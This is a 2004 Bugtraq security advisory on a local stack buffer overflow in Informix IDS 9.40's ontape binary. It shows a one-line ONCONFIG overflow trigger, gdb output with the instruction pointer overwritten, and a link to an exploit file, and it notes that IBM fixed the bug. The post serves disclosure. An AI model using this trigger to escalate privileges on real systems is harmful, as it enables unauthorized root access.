----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------

pask_at_open3s.com
Date: 01/29/04

  • Next message: pask_at_open3s.com: "----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------" 
    Date: Thu, 29 Jan 2004 10:19:58 +0100 (CET)
To: bugtraq@securityfocus.com

            ----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------

     Title: Local Vulnerability at Informix IDSv9.40 via ontape binary
     Date: 08-08-2003
     Platform: Only tested in Linux but can be exported to others.
     Impact: Any user with DSA privileges over Informix could achieve root
               privileges through a stack buffer overflow in ontape binary
     Author: Juan Manuel Pascual Escriba pask@open3s.com
     Status: Solved by IBM Corp.

    PROBLEM SUMMARY:

        Stack Buffer overflow exists in ONCONFIG environment variable read
    process when it's bigger than 495 bytes.

    [informix@dimoni bin]$ export ONCONFIG=`perl -e 'print "A"x495'`
    [informix@dimoni bin]$ ./ontape
    WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
    Segmentation fault

    [pask@dimoniet bin]$ gdb ./ontape
    (gdb) r
    WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
    Segmentation fault

    (gdb) info reg
    eax 0xffffffff -1
    ecx 0x40083580 1074279808
    edx 0x46 70
    ebx 0x1 1
    esp 0xbfff74a0 0xbfff74a0
    ebp 0x41414141 0x41414141
    esi 0xbfff74cc -1073777460
    edi 0x0 0
    eip 0x41414141 0x41414141

    It's posible to achieve root privileges through this buffer overflow.

    IMPACT:
        Any user with exec permision over ontape could achieve root
    privileges. In my default installation only users with DSA privileges
    can exec this binary.

    SOLUTION:

            See more infomartion about this vulnerability and workaround at:
    http://www-1.ibm.com/support/docview.wss?uid=swg21153336

    STATUS

    Reported to IBM security team at 11th of August 2003

    See more infomartion about this vulnerability and workaround at:
    http://www-1.ibm.com/support/docview.wss?uid=swg21153336

    This vulnerability was managed in an efficient manner by Jonathan Leffler
    from IBM Informix Database Engineering Team.

    EXPLOIT
        http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c

    --------------------------------------------------
    This vulnerability was researched by:
    Juan Manuel Pascual Escriba pask@open3s.com
    Barcelona - Spain http://www.open3s.com

  • Next message: pask_at_open3s.com: "----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------"